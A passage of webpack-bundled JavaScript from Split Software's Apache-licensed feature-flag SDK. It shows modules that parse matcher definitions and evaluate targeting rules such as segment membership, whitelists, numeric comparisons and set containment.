You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/






 // Flat the complex matcherGroup structure into something handy.

function transform(matchers) {
  var parsedMatchers = matchers.map(function (matcher) {
    var matcherType = matcher.matcherType,
        negate = matcher.negate,
        keySelector = matcher.keySelector,
        segmentObject = matcher.userDefinedSegmentMatcherData,
        whitelistObject = matcher.whitelistMatcherData,
        unaryNumericObject = matcher.unaryNumericMatcherData,
        betweenObject = matcher.betweenMatcherData,
        dependencyObject = matcher.dependencyMatcherData,
        booleanMatcherData = matcher.booleanMatcherData,
        stringMatcherData = matcher.stringMatcherData;
    var attribute = keySelector && keySelector.attribute;
    var type = Object(__WEBPACK_IMPORTED_MODULE_1__matchers_types__["b" /* mapper */])(matcherType); // As default input data type we use string (even for ALL_KEYS)

    var dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].STRING;
    var value = undefined;

    if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].SEGMENT) {
      value = Object(__WEBPACK_IMPORTED_MODULE_2__segment__["a" /* default */])(segmentObject);
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].WHITELIST) {
      value = Object(__WEBPACK_IMPORTED_MODULE_3__whitelist__["a" /* default */])(whitelistObject);
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].EQUAL_TO) {
      value = Object(__WEBPACK_IMPORTED_MODULE_5__unaryNumeric__["a" /* default */])(unaryNumericObject);
      dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].NUMBER;

      if (unaryNumericObject.dataType === 'DATETIME') {
        value = Object(__WEBPACK_IMPORTED_MODULE_6__convertions__["a" /* zeroSinceHH */])(value);
        dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].DATETIME;
      }
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].GREATER_THAN_OR_EQUAL_TO || type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].LESS_THAN_OR_EQUAL_TO) {
      value = Object(__WEBPACK_IMPORTED_MODULE_5__unaryNumeric__["a" /* default */])(unaryNumericObject);
      dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].NUMBER;

      if (unaryNumericObject.dataType === 'DATETIME') {
        value = Object(__WEBPACK_IMPORTED_MODULE_6__convertions__["b" /* zeroSinceSS */])(value);
        dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].DATETIME;
      }
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].BETWEEN) {
      value = betweenObject;
      dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].NUMBER;

      if (betweenObject.dataType === 'DATETIME') {
        value.start = Object(__WEBPACK_IMPORTED_MODULE_6__convertions__["b" /* zeroSinceSS */])(value.start);
        value.end = Object(__WEBPACK_IMPORTED_MODULE_6__convertions__["b" /* zeroSinceSS */])(value.end);
        dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].DATETIME;
      }
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].EQUAL_TO_SET || type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].CONTAINS_ANY_OF_SET || type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].CONTAINS_ALL_OF_SET || type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].PART_OF_SET) {
      value = Object(__WEBPACK_IMPORTED_MODULE_4__set__["a" /* default */])(whitelistObject);
      dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].SET;
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].STARTS_WITH || type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].ENDS_WITH || type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].CONTAINS_STRING) {
      value = Object(__WEBPACK_IMPORTED_MODULE_4__set__["a" /* default */])(whitelistObject);
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].IN_SPLIT_TREATMENT) {
      value = dependencyObject;
      dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].NOT_SPECIFIED;
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].EQUAL_TO_BOOLEAN) {
      dataType = __WEBPACK_IMPORTED_MODULE_1__matchers_types__["a" /* dataTypes */].BOOLEAN;
      value = booleanMatcherData;
    } else if (type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].MATCHES_STRING) {
      value = stringMatcherData;
    }

    return {
      attribute: attribute,
      // attribute over we should do the matching, undefined means 'use the key'
      negate: negate,
      // should we negate the result?
      type: type,
      // which kind of matcher we should evaluate
      value: value,
      // metadata used for the matching
      dataType: dataType // runtime input data type

    };
  });

  if (Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["c" /* findIndex */])(parsedMatchers, function (m) {
    return m.type === __WEBPACK_IMPORTED_MODULE_1__matchers_types__["c" /* types */].UNDEFINED;
  }) === -1) {
    return parsedMatchers;
  } else {
    return [];
  }
}

/* harmony default export */ __webpack_exports__["a"] = (transform);

/***/ }),
/* 2796 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/**
 * Extract segment name as a plain string.
 */
function transform(segment) {
  if (segment === void 0) {
    segment = {};
  }

  return segment.segmentName;
}

/* harmony default export */ __webpack_exports__["a"] = (transform);

/***/ }),
/* 2797 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang_Sets__ = __webpack_require__(353);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function transform(whitelistObject) {
  return new __WEBPACK_IMPORTED_MODULE_0__utils_lang_Sets__["a" /* _Set */](whitelistObject.whitelist);
}

/* harmony default export */ __webpack_exports__["a"] = (transform);

/***/ }),
/* 2798 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function transform(whitelistObject) {
  return whitelistObject.whitelist;
}

/* harmony default export */ __webpack_exports__["a"] = (transform);

/***/ }),
/* 2799 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function transform(unaryNumericObject) {
  return unaryNumericObject.value;
}

/* harmony default export */ __webpack_exports__["a"] = (transform);

/***/ }),
/* 2800 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function Treatments(ranges, treatments) {
  if (!(this instanceof Treatments)) {
    return new Treatments(ranges, treatments);
  }

  if (ranges[ranges.length - 1] !== 100) {
    throw new RangeError('Provided invalid dataset as input');
  }

  this._ranges = ranges;
  this._treatments = treatments;
}

Treatments.parse = function parse(data) {
  var _data$reduce = data.reduce(function (accum, value) {
    var size = value.size,
        treatment = value.treatment;
    accum.ranges.push(accum.inc += size);
    accum.treatments.push(treatment);
    return accum;
  }, {
    inc: 0,
    ranges: [],
    treatments: []
  }),
      ranges = _data$reduce.ranges,
      treatments = _data$reduce.treatments;

  return new Treatments(ranges, treatments);
};

Treatments.prototype.getTreatmentFor = function getTreatmentFor(x) {
  if (x < 0 || x > 100) {
    throw new RangeError('Please provide a value between 0 and 100');
  } // Readme [1]
  // We need to manually add any dependency which escape of dummy resolution
  // I'll deal with this in a future release
  // for (let [k, r] of this._ranges.entries()) {
  //   if (x <= r) return this._treatments[k];
  // }


  var index = Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["c" /* findIndex */])(this._ranges, function (range) {
    return x <= range;
  });
  var treatment = this._treatments[index];
  return treatment;
};

/* harmony default export */ __webpack_exports__["a"] = (Treatments);

/***/ }),
/* 2801 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__types__ = __webpack_require__(698);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__all__ = __webpack_require__(2802);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__segment__ = __webpack_require__(2803);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__whitelist__ = __webpack_require__(2804);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__eq__ = __webpack_require__(2805);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__gte__ = __webpack_require__(2806);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__lte__ = __webpack_require__(2807);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__between__ = __webpack_require__(2808);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__eq_set__ = __webpack_require__(2809);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__cont_all__ = __webpack_require__(2810);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__cont_any__ = __webpack_require__(2811);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__part_of__ = __webpack_require__(2812);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__sw__ = __webpack_require__(2813);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__ew__ = __webpack_require__(2814);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__cont_str__ = __webpack_require__(2815);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15__dependency__ = __webpack_require__(2816);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16__boolean__ = __webpack_require__(2817);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17__string__ = __webpack_require__(2818);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


















/**
 * Matcher factory.
 */

function MatcherFactory(matcherDto, storage) {
  var type = matcherDto.type,
      value = matcherDto.value;
  var matcherFn;

  if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].ALL) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_1__all__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].SEGMENT) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_2__segment__["a" /* default */])(value, storage);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].WHITELIST) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_3__whitelist__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].EQUAL_TO) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_4__eq__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].GREATER_THAN_OR_EQUAL_TO) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_5__gte__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].LESS_THAN_OR_EQUAL_TO) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_6__lte__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].BETWEEN) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_7__between__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].EQUAL_TO_SET) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_8__eq_set__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].CONTAINS_ANY_OF_SET) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_10__cont_any__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].CONTAINS_ALL_OF_SET) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_9__cont_all__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].PART_OF_SET) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_11__part_of__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].STARTS_WITH) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_12__sw__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].ENDS_WITH) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_13__ew__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].CONTAINS_STRING) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_14__cont_str__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].IN_SPLIT_TREATMENT) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_15__dependency__["a" /* default */])(value, storage);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].EQUAL_TO_BOOLEAN) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_16__boolean__["a" /* default */])(value);
  } else if (type === __WEBPACK_IMPORTED_MODULE_0__types__["c" /* types */].MATCHES_STRING) {
    matcherFn = Object(__WEBPACK_IMPORTED_MODULE_17__string__["a" /* default */])(value);
  }

  return matcherFn;
}

/* harmony default export */ __webpack_exports__["a"] = (MatcherFactory);

/***/ }),
/* 2802 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function allMatcher(runtimeAttr
/*: string */
)
/*: boolean */
{
  log.debug('[allMatcher] is always true');
  return runtimeAttr != null;
}

function allMatcherContext() {
  return allMatcher;
}

/* harmony default export */ __webpack_exports__["a"] = (allMatcherContext);

/***/ }),
/* 2803 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__ = __webpack_require__(75);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function matcherSegmentContext(segmentName, storage) {
  function segmentMatcher(key) {
    var isInSegment = storage.segments.isInSegment(segmentName, key);

    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(isInSegment)) {
      isInSegment.then(function (result) {
        log.debug("[asyncSegmentMatcher] evaluated " + segmentName + " / " + key + " => " + isInSegment);
        return result;
      });
    } else {
      log.debug("[segmentMatcher] evaluated " + segmentName + " / " + key + " => " + isInSegment);
    }

    return isInSegment;
  }

  return segmentMatcher;
}

/* harmony default export */ __webpack_exports__["a"] = (matcherSegmentContext);

/***/ }),
/* 2804 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang_Sets__ = __webpack_require__(353);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-engine:matcher');

function whitelistMatcherContext(ruleAttr
/*: Set */
)
/*: Function */
{
  return function whitelistMatcher(runtimeAttr
  /*: string */
  )
  /*: boolean */
  {
    var isInWhitelist = ruleAttr.has(runtimeAttr);
    log.debug("[whitelistMatcher] evaluated " + runtimeAttr + " in [" + Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang_Sets__["b" /* setToArray */])(ruleAttr).join(',') + "] => " + isInWhitelist);
    return isInWhitelist;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (whitelistMatcherContext);

/***/ }),
/* 2805 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function equalToMatcherContext(ruleAttr
/*: number */
)
/*: Function */
{
  return function equalToMatcher(runtimeAttr
  /*: number */
  )
  /*: boolean */
  {
    var isEqual = runtimeAttr === ruleAttr;
    log.debug("[equalToMatcher] is " + runtimeAttr + " equal to " + ruleAttr + "? " + isEqual);
    return isEqual;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (equalToMatcherContext);

/***/ }),
/* 2806 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function greaterThanEqualMatcherContext(ruleAttr
/*: number */
)
/*: Function */
{
  return function greaterThanEqualMatcher(runtimeAttr
  /*: number */
  )
  /*: boolean */
  {
    var isGreaterEqualThan = runtimeAttr >= ruleAttr;
    log.debug("[greaterThanEqualMatcher] is " + runtimeAttr + " greater than " + ruleAttr + "? " + isGreaterEqualThan);
    return isGreaterEqualThan;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (greaterThanEqualMatcherContext);

/***/ }),
/* 2807 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function lessThanEqualMatcherContext(ruleAttr
/*: number */
)
/*: function */
{
  return function lessThanEqualMatcher(runtimeAttr
  /*: number */
  )
  /*: boolean */
  {
    var isLessEqualThan = runtimeAttr <= ruleAttr;
    log.debug("[lessThanEqualMatcher] is " + runtimeAttr + " less than " + ruleAttr + "? " + isLessEqualThan);
    return isLessEqualThan;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (lessThanEqualMatcherContext);

/***/ }),
/* 2808 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function betweenMatcherContext(ruleVO
/*: betweenObject */
)
/*: Function */
{
  return function betweenMatcher(runtimeAttr
  /*: number */
  )
  /*: boolean */
  {
    var isBetween = runtimeAttr >= ruleVO.start && runtimeAttr <= ruleVO.end;
    log.debug("[betweenMatcher] is " + runtimeAttr + " between " + ruleVO.start + " and " + ruleVO.end + "? " + isBetween);
    return isBetween;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (betweenMatcherContext);

/***/ }),
/* 2809 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function equalToSetMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
  return function equalToSetMatcher(runtimeAttr
  /*: array */
  )
  /*: boolean */
  {
    // Length being the same is the first condition.
    var isEqual = runtimeAttr.length === ruleAttr.length;

    var _loop = function _loop(i) {
      // if length is the same we check that all elements are present in the other collection.
      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["c" /* findIndex */])(ruleAttr, function (e) {
        return e === runtimeAttr[i];
      }) < 0) isEqual = false;
    };

    for (var i = 0; i < runtimeAttr.length && isEqual; i++) {
      _loop(i);
    }

    log.debug("[equalToSetMatcher] is " + runtimeAttr + " equal to set " + ruleAttr + "? " + isEqual);
    return isEqual;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (equalToSetMatcherContext);

/***/ }),
/* 2810 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function containsAllMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
  return function containsAllMatcher(runtimeAttr
  /*: array */
  )
  /*: boolean */
  {
    var containsAll = true;

    if (runtimeAttr.length < ruleAttr.length) {
      containsAll = false;
    } else {
      var _loop = function _loop(i) {
        if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["c" /* findIndex */])(runtimeAttr, function (e) {
          return e === ruleAttr[i];
        }) < 0) containsAll = false;
      };

      for (var i = 0; i < ruleAttr.length && containsAll; i++) {
        _loop(i);
      }
    }

    log.debug("[containsAllMatcher] " + runtimeAttr + " contains all elements of " + ruleAttr + "? " + containsAll);
    return containsAll;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (containsAllMatcherContext);

/***/ }),
/* 2811 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');


function containsAnyMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
  return function containsAnyMatcher(runtimeAttr
  /*: array */
  )
  /*: boolean */
  {
    var containsAny = false;

    var _loop = function _loop(i) {
      if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["c" /* findIndex */])(runtimeAttr, function (e) {
        return e === ruleAttr[i];
      }) >= 0) containsAny = true;
    };

    for (var i = 0; i < ruleAttr.length && !containsAny; i++) {
      _loop(i);
    }

    log.debug("[containsAnyMatcher] " + runtimeAttr + " contains at least an element of " + ruleAttr + "? " + containsAny);
    return containsAny;
  };
}

/* harmony default export */ __webpack_exports__["a"] = (containsAnyMatcherContext);

/***/ }),
/* 2812 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-engine:matcher');

function partOfMatcherContext(ruleAttr
/*: array */
)
/*: Function */
{
